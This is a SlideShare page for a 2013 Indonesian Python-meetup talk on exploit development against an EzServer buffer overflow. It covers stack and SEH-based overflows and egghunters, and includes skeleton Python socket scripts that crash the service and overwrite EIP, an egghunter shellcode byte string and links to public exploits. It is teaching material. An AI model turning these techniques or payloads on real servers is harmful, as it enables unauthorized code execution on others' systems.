SlideShare a Scribd company logo

Exploit Development: EzServer Buffer Overflow oleh Tom Gregory

Download as PPTX, PDF
Z
zakiakhmad

EzServer adalah video server yang dapat melakukan stream dengan kualitas full HD ke berbagai mesin. Buffer overflow ditemukan pada aplikasi EzServer yang berjalan pada port 8000. Attacker dapat mengirimkan sejumlah kode berbahaya ke port 8000 dan mendapatkan akses setara dengan hak akses aplikasi EzServer. Pada kesempatan ini, penulis akan memaparkan proses pembuatan exploit terhadap aplikasi EzServer menggunakan Python. Tom Gregory: Security consultant at Spentera, Metasploit exploit developer/contributor. http://www.python.or.id/2013/04/kopi-darat-komunitas-python-indonesia.html

Technology
1 of 25
EXPLOIT DEVELOPMENT WITH PYTHON Tom Gregory id:python Gathering 27 April 2013
AGENDA  Memory  Stack/Buffer Overflow  Structured Exception Handler (SEH)  Escape from small space  Egghunter  Demo
Args./Environment Stack Unused Memory Heap (dynamic data) Static Data .data Program Code .text PROCESS MEMORY LAYOUT High addresses Top of memory 0xFFFFFFFF Low addresses 0x00000000 Stack grows down by procedures call Heap grows up e.g. by malloc and new
STACK BUFFER OVERFLOW #include <string.h> void foo (char *bar) { char c[12]; strcpy(c, bar); // no bounds checking... } int main (int argc, char **argv) { foo(argv[1]); }
STACK BUFFER OVERFLOW Unallocated stack char c[12] char *bar Saved frame pointer (EBP) Return Address (EIP) Parent routine‟s stack Memory addressStack growth
STACK BUFFER OVERFLOW Unallocated stack char c[12] char *bar Saved frame pointer (EBP) Return Address (EIP) Parent routine‟s stack Memory addressStack growth h e l l 0o
STACK BUFFER OVERFLOW Unallocated stack Memory addressStack growth A A A A A A A A A A A A A A A A A A A A A A A A A A A A x08 x35 xc0 x80 Fill the stack with „A‟ Overwritten return address at 0x80c03508 Parent routine‟s stack Little Endian 0x80c03508
WHAT IS SEH? This structure ( also called a SEH record) is 8 bytes and has 2 (4 bytes each) elements :  a pointer to the next exception_registration structure (in essence, to the next SEH record, in case the current handler is unable the handle the exception)  a pointer, the address of the actual code of the exception handler. (SE Handler)
WHAT IS SEH? Image was taken without permission from http://images.google.com
LOOK AT THE SEH STRUCTURE Beginning of SEH chain  SEH chain will be placed at the top of the main data block  It also called FS:[0] chain as well (on intel: mov [reg], dword ptr fs:[0]) End of seh chain  Is indicated by 0xFFFFFFFF  Will trigger improper termination to the program
HOW SEH WORKS? Stack TEB FS[0]: 0012FF40 0012FF40 0012FF44 0012FFB0 : next SEH record 7C839AD8 : SE Handler 0012FFB0 0012FFB4 0012FFE0 : next SEH record 0040109A : SE Handler 0012FFE0 0012FFE4 FFFFFFFF : next SEH record 7C839AD8 : SE Handler
PROTECTIONS AGAINST SEH XOR  before the exception handler is called, all registers are XORed with each other, so it will make them all point to 0x00000000 DEP & Stack Cookies  Stack Cookies or Canary is setup via C++ compiler options  DEP will mark the memory stack to no execute.  It was introduced since Windows XP SP2 and Windows 2003, enabled by default on Windows Vista and 7  Those two protections can make it harder to build exploits.
PROTECTIONS AGAINST SEH SafeSEH  additional protection was added to compilers, helping to stop the abuse of SEH overwrites.  It will check the original value of SEH, if it overwritten, SafeSEH will try to bring it back to the original value.
ABUSING SEH On direct RET technique:  Simply find an instruction to jump to the stack, done. While on SEH Based:  You cannot simply jump to the stack, because the registers are XORed.  We can take advantage this exception handling condition by overwrite the SE Handler address.  The OS will know the exception handling routine, and pass it to next SEH record.  Pointer to next SEH will bring us to the shellcode.  Game over!
ABUSING SEH In other words, the payload must do the following things:  Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won‟t kick in.  Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)  Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.  The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten “pointer to next SEH record” will jump to it).
ABUSING SEH  When the exception occurred, the position on the stack will going like this:  Possible value to overwrite SE Handler are POP something, POP something and RETN to the stack.  It will POP address that sit at the top of the stack, POP it again to take the second address, and RETN to execute the third address (which is now at the top of the stack) Top of stack Our pointer to next SEH address
ABUSING SEH Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
ESCAPE FROM SMALL SPACE  Use Egghunter  “Staged shellcode”  Use small amount of custom shellcode to find the actual “bigger” shellcode (the egg), by searching entire memory for the final shellcode
EGGHUNTER  There are 3 conditions that are important in order for this technique to work  We must be able to jump to (jmp, call, push/ret) & execute “some” shellcode, the egghunter.  The final shellcode must be available somewhere in memory (stack/heap/…).  You must “tag” or prepend the final shellcode with a unique string/marker/tag. This means that we will have to define the marker in the egg hunter code, and also write it just in front of the actual shellcode.
ENOUGH TALKING!
1ST SKELETON EXPLOIT: CRASH IT! #!/usr/bin/python from socket import * junk = "x41" * 10000 s = socket(AF_INET, SOCK_STREAM) s.connect((„x.x.x.x‟,8000)) print "[+] Launching attack..” s.send ("GET /" + payload + "HTTP/1.0rnrnrn") s.close()
2ND SKELETON EXPLOIT: EIP OVERWRITE #!/usr/bin/python from socket import * junk = [random data generated from msf] s = socket(AF_INET, SOCK_STREAM) s.connect((„x.x.x.x‟,8000)) print "[+] Launching attack..” s.send ("GET /" + payload + "HTTP/1.0rnrnrn") s.close()
3RD SKELETON EXPLOIT: SMALL SPACE  Egghunter x66x81xcaxffx0fx42x52x6a x02x58xcdx2ex3cx05x5ax74 xefxb8x77x30x30x74x8bxfa xafx75xeaxafx75xe7xffxe7
4TH FINAL EXPLOIT  Exploit DB  http://www.exploit-db.com/exploits/19266/  Metasploit  http://www.exploit-db.com/exploits/19291/  http://www.metasploit.com/modules/exploit/windows/http/ezserver_http
EOF tom@spentera.com

Recommended

CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessThomas Gregory
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 
lec4.docx
lec4.docxlec4.docx
lec4.docxismailaboshatra
 
What's New in PHP 5.5
What's New in PHP 5.5What's New in PHP 5.5
What's New in PHP 5.5Corey Ballou
 
35787646 system-software-lab-manual
35787646 system-software-lab-manual35787646 system-software-lab-manual
35787646 system-software-lab-manualNaveen Kumar
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
Linux Command Line
Linux Command LineLinux Command Line
Linux Command LinePrima Yogi Loviniltra
 
As400 session or device error
As400 session or device errorAs400 session or device error
As400 session or device erroraminem_mp
 

Recommended

CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessThomas Gregory
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 
lec4.docx
lec4.docxlec4.docx
lec4.docxismailaboshatra
 
What's New in PHP 5.5
What's New in PHP 5.5What's New in PHP 5.5
What's New in PHP 5.5Corey Ballou
 
35787646 system-software-lab-manual
35787646 system-software-lab-manual35787646 system-software-lab-manual
35787646 system-software-lab-manualNaveen Kumar
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
Linux Command Line
Linux Command LineLinux Command Line
Linux Command LinePrima Yogi Loviniltra
 
As400 session or device error
As400 session or device errorAs400 session or device error
As400 session or device erroraminem_mp
 
Emulador de ensamblador emu8086
Emulador de ensamblador emu8086Emulador de ensamblador emu8086
Emulador de ensamblador emu8086Marco Muñoz
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
Introduction to Perl Programming
Introduction to Perl ProgrammingIntroduction to Perl Programming
Introduction to Perl ProgrammingCollaboration Technologies
 
Compiladoresemulador
CompiladoresemuladorCompiladoresemulador
CompiladoresemuladorDavid Caicedo
 
Javascript fundamentals for php developers
Javascript fundamentals for php developersJavascript fundamentals for php developers
Javascript fundamentals for php developersChris Ramakers
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDBJian-Yu Li
 
Instalación de emu8086 y compilados
Instalación de emu8086 y compiladosInstalación de emu8086 y compilados
Instalación de emu8086 y compiladosDiego Erazo
 
ROP
ROPROP
ROPJian-Yu Li
 
The State of PHPUnit
The State of PHPUnitThe State of PHPUnit
The State of PHPUnitEdorian
 
The State of PHPUnit
The State of PHPUnitThe State of PHPUnit
The State of PHPUnitEdorian
 
Abusing SEH For Fun
Abusing SEH For FunAbusing SEH For Fun
Abusing SEH For FunDigital Echidna
 
Javascript basics
Javascript basicsJavascript basics
Javascript basicsFin Chen
 
React Js Training In Bangalore | ES6 Concepts in Depth
React Js Training In Bangalore | ES6 Concepts in DepthReact Js Training In Bangalore | ES6 Concepts in Depth
React Js Training In Bangalore | ES6 Concepts in DepthSiva Vadlamudi
 
smtlecture.9
smtlecture.9smtlecture.9
smtlecture.9Roberto Bruttomesso
 
Unit 4
Unit 4Unit 4
Unit 4siddr
 
Metasploit cheat sheet
Metasploit cheat sheetMetasploit cheat sheet
Metasploit cheat sheethughpearse
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
Functuon
FunctuonFunctuon
FunctuonNithyaNithyav
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Exploiting stack overflow 101
Exploiting stack overflow 101Exploiting stack overflow 101
Exploiting stack overflow 101n|u - The Open Security Community
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 

More Related Content

What's hot

Emulador de ensamblador emu8086
Emulador de ensamblador emu8086Emulador de ensamblador emu8086
Emulador de ensamblador emu8086Marco Muñoz
 
Seh based attack
Seh based attackSeh based attack
Seh based attackMihir Shah
 
Compiladoresemulador
CompiladoresemuladorCompiladoresemulador
CompiladoresemuladorDavid Caicedo
 
Javascript fundamentals for php developers
Javascript fundamentals for php developersJavascript fundamentals for php developers
Javascript fundamentals for php developersChris Ramakers
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassemblingHarsh Daftary
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDBJian-Yu Li
 
Instalación de emu8086 y compilados
Instalación de emu8086 y compiladosInstalación de emu8086 y compilados
Instalación de emu8086 y compiladosDiego Erazo
 
The State of PHPUnit
The State of PHPUnitThe State of PHPUnit
The State of PHPUnitEdorian
 
The State of PHPUnit
The State of PHPUnitThe State of PHPUnit
The State of PHPUnitEdorian
 
Javascript basics
Javascript basicsJavascript basics
Javascript basicsFin Chen
 
React Js Training In Bangalore | ES6 Concepts in Depth
React Js Training In Bangalore | ES6 Concepts in DepthReact Js Training In Bangalore | ES6 Concepts in Depth
React Js Training In Bangalore | ES6 Concepts in DepthSiva Vadlamudi
 
Unit 4
Unit 4Unit 4
Unit 4siddr
 
Metasploit cheat sheet
Metasploit cheat sheetMetasploit cheat sheet
Metasploit cheat sheethughpearse
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 

What's hot (19)

Emulador de ensamblador emu8086
Emulador de ensamblador emu8086Emulador de ensamblador emu8086
Emulador de ensamblador emu8086
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
Introduction to Perl Programming
Introduction to Perl ProgrammingIntroduction to Perl Programming
Introduction to Perl Programming
 
Compiladoresemulador
CompiladoresemuladorCompiladoresemulador
Compiladoresemulador
 
Javascript fundamentals for php developers
Javascript fundamentals for php developersJavascript fundamentals for php developers
Javascript fundamentals for php developers
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
 
Instalación de emu8086 y compilados
Instalación de emu8086 y compiladosInstalación de emu8086 y compilados
Instalación de emu8086 y compilados
 
ROP
ROPROP
ROP
 
The State of PHPUnit
The State of PHPUnitThe State of PHPUnit
The State of PHPUnit
 
The State of PHPUnit
The State of PHPUnitThe State of PHPUnit
The State of PHPUnit
 
Abusing SEH For Fun
Abusing SEH For FunAbusing SEH For Fun
Abusing SEH For Fun
 
Javascript basics
Javascript basicsJavascript basics
Javascript basics
 
React Js Training In Bangalore | ES6 Concepts in Depth
React Js Training In Bangalore | ES6 Concepts in DepthReact Js Training In Bangalore | ES6 Concepts in Depth
React Js Training In Bangalore | ES6 Concepts in Depth
 
smtlecture.9
smtlecture.9smtlecture.9
smtlecture.9
 
Unit 4
Unit 4Unit 4
Unit 4
 
Metasploit cheat sheet
Metasploit cheat sheetMetasploit cheat sheet
Metasploit cheat sheet
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
Functuon
FunctuonFunctuon
Functuon
 

Similar to Exploit Development: EzServer Buffer Overflow oleh Tom Gregory

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfPatricia Aas
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer OverflowsSumit Kumar
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsAjin Abraham
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredKory Kyzar
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introductionPatricia Aas
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringSumutiu Marius
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)CODE BLUE
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basicssecurityxploded
 
Heap overflows for humans – 101
Heap overflows for humans – 101Heap overflows for humans – 101
Heap overflows for humans – 101Craft Symbol
 
[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitlandZoltan Balazs
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughterQuinn Wilton
 

Similar to Exploit Development: EzServer Buffer Overflow oleh Tom Gregory (20)

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Exploiting stack overflow 101
Exploiting stack overflow 101Exploiting stack overflow 101
Exploiting stack overflow 101
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer Overflows
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
null Pune meet - Application Security: Code injection
null Pune meet - Application Security: Code injectionnull Pune meet - Application Security: Code injection
null Pune meet - Application Security: Code injection
 
Return Oriented Programming, an introduction
Return Oriented Programming, an introductionReturn Oriented Programming, an introduction
Return Oriented Programming, an introduction
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Heap overflows for humans – 101
Heap overflows for humans – 101Heap overflows for humans – 101
Heap overflows for humans – 101
 
[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 

More from zakiakhmad

Python for Earth
Python for EarthPython for Earth
Python for Earthzakiakhmad
 
Analisa data di python dengan pandas
Analisa data di python dengan pandasAnalisa data di python dengan pandas
Analisa data di python dengan pandaszakiakhmad
 
Raspberry Pi dan Alat Parkir UI
Raspberry Pi dan Alat Parkir UIRaspberry Pi dan Alat Parkir UI
Raspberry Pi dan Alat Parkir UIzakiakhmad
 
Load Balancer Linux with LVS - Rizki Nanda Agam
Load Balancer Linux with LVS - Rizki Nanda AgamLoad Balancer Linux with LVS - Rizki Nanda Agam
Load Balancer Linux with LVS - Rizki Nanda Agamzakiakhmad
 
RaspberryPi 101 at Python ID October 2013 Meetup
RaspberryPi 101 at Python ID October 2013 MeetupRaspberryPi 101 at Python ID October 2013 Meetup
RaspberryPi 101 at Python ID October 2013 Meetupzakiakhmad
 
RNDC - Eulogi Arif Wicaksono aka @sakitjiwa
RNDC - Eulogi Arif Wicaksono aka @sakitjiwaRNDC - Eulogi Arif Wicaksono aka @sakitjiwa
RNDC - Eulogi Arif Wicaksono aka @sakitjiwazakiakhmad
 
Pengantar Mobile Security
Pengantar Mobile Security Pengantar Mobile Security
Pengantar Mobile Security zakiakhmad
 

More from zakiakhmad (8)

Python for Earth
Python for EarthPython for Earth
Python for Earth
 
Analisa data di python dengan pandas
Analisa data di python dengan pandasAnalisa data di python dengan pandas
Analisa data di python dengan pandas
 
Raspberry Pi dan Alat Parkir UI
Raspberry Pi dan Alat Parkir UIRaspberry Pi dan Alat Parkir UI
Raspberry Pi dan Alat Parkir UI
 
Load Balancer Linux with LVS - Rizki Nanda Agam
Load Balancer Linux with LVS - Rizki Nanda AgamLoad Balancer Linux with LVS - Rizki Nanda Agam
Load Balancer Linux with LVS - Rizki Nanda Agam
 
RaspberryPi 101 at Python ID October 2013 Meetup
RaspberryPi 101 at Python ID October 2013 MeetupRaspberryPi 101 at Python ID October 2013 Meetup
RaspberryPi 101 at Python ID October 2013 Meetup
 
RNDC - Eulogi Arif Wicaksono aka @sakitjiwa
RNDC - Eulogi Arif Wicaksono aka @sakitjiwaRNDC - Eulogi Arif Wicaksono aka @sakitjiwa
RNDC - Eulogi Arif Wicaksono aka @sakitjiwa
 
rq talk
rq talkrq talk
rq talk
 
Pengantar Mobile Security
Pengantar Mobile Security Pengantar Mobile Security
Pengantar Mobile Security
 

Recently uploaded

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 

Recently uploaded (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
